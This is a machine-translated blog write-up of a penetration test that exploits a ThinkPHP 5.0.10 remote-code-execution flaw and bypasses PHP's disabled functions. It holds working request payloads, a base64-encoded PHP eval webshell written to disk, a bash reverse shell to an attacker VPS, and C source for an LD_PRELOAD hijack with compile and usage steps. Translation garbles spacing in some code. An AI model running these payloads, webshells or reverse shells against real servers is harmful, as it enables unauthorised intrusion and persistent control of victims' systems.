Shulou(Shulou.com)06/01 Report--

This article mainly shows you the "Thinkphp bypass disabled function example analysis", the content is easy to understand, clear, hope to help you solve your doubts, the following let Xiaobian lead you to study and learn "Thinkphp bypass disabled function example analysis" this article.

Preface

In a penetration test, after searching by hand for a long time, I didn't find anything, so I opened xray with the mood of trying.

Sure enough, xray is quite powerful. As soon as it opens the web page, xray directly scans out the thinkphp 5.0.10 rce vulnerability.

Directly use the command to execute payload, and as a result, the system function is disabled.

S=whoami&_method=__construct&method=&filter [] = system

Try to use other functions, and after testing, it is found that the call_user_func function is not disabled.

Payload

S=phpinfo&_method=__construct&method=get&filter [] = call_user_func

You can see which functions are disabled

Seeing that assert and include were not disabled, at first I wanted to write shell into the log and then take advantage of the file inclusion. I found that there was no response and no error was reported.

File_put_contents

Go back to the disabled function and find that the file function is not disabled. You can use the file_put_contents function to write the file.

Test writing to phpinfo file

S=file_put_contents ('/ www/wwwroot/public/phpinfo.php',base64_decode ('PD9waHAgJHBhc3M9JF9QT1NUWydhYWFhJ107ZXZhbCgkcGFzcyk7Pz4')) & _ method=__construct&filter=assert

Write successful

Write the ice scorpion horse for file management.

Although the file operation can be performed, the command cannot be executed.

Pcntl_exec

Thinking of the command execution function pcntl_exec, which is easy to be ignored, it is found that the pcntl_exec function is not disabled, and the function can specify a program to execute the specified file.

First write an exe.php file and specify the parameters of pcntl_exec in the file (execute the running program, run the specified file)

Exec.sh file write bounce command

Bash-I > & / dev/tcp/vpsip/7777 0 > & 1

Browser visits exe.php successfully bounces shell

LD_PRELOAD hijacking

This infiltration is over. Another bypass method has been tried here. If the pcntl_exec function is also disabled, you can use the environment variable LD_PRELOAD to hijack the system function and let the external program load malicious *. So to achieve the effect of executing system commands. There is no need to dwell on the detailed introduction of the principle. You can refer to this big brother's article https://www.meetsec.cn/index.php/archives/44/.

This method mainly needs to upload a .php and a shared object .so file compiled by a .c program to the server.

Bypass_disablefunc.php

Bypass_disablefunc.php provides three parameters:

Cmd parameter, the system command to be executed (such as whoami).

Outpath parameter, save the file path of the output result of the command execution (such as / www/wwwroot/public), easy to display on the page, and you should pay attention to whether web has read and write access, whether web can be accessed across directories, files will be overwritten and deleted, and so on.

The sopath parameter, which specifies the absolute path to the shared object of the hijacking system function (such as / www/wwwroot/bypass_disablefunc_x64.so). In addition, you should pay attention to whether web can access it across directories, preferably to the root directory of web.

Bypass_disablefunc.c

# define _ GNU_SOURCE#include # include # include extern char** environ;__attribute__ ((_ _ constructor__)) void preload (void) {/ / get command line options and arg const char* cmdline = getenv ("EVIL_CMDLINE"); / / unset environment variable LD_PRELOAD. / / unsetenv ("LD_PRELOAD") no effect on some / / distribution (e.g.centos), I need crafty trick. Int i; for (I = 0; environ [I]; + + I) {if (strstr (environ [I], "LD_PRELOAD")) {environ [I] [0] ='\ 0mm;}} / / executive command system (cmdline);}

Here you need to compile bypass_disablefunc.c to a shared object bypass_disablefunc_x64.so with the command gcc-shared-fPIC bypass_disablefunc.c-o bypass_disablefunc_x64.so

To compile to different versions according to the target architecture, in an x64 environment, the default is x64 if there is no compilation option, and the-M32 option is required to compile to x86 architecture.

You can find the above required files on github

Https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD

Here, use the previous file management ice scorpion shell to upload php and so files to the server web directory

Access the bypass_disablefunc.php input parameters in the browser

Http://www.xxx.com/bypass_disablefunc.php?cmd=ls&outpath=/www/wwwroot%20/public/1.txt&sopath=/www/wwwroot/public/bypass_disablefunc_x64.so

Successful execution of command

The above is all the content of the article "sample Analysis of Thinkphp Bypass disabled functions". Thank you for reading! I believe we all have a certain understanding, hope to share the content to help you, if you want to learn more knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.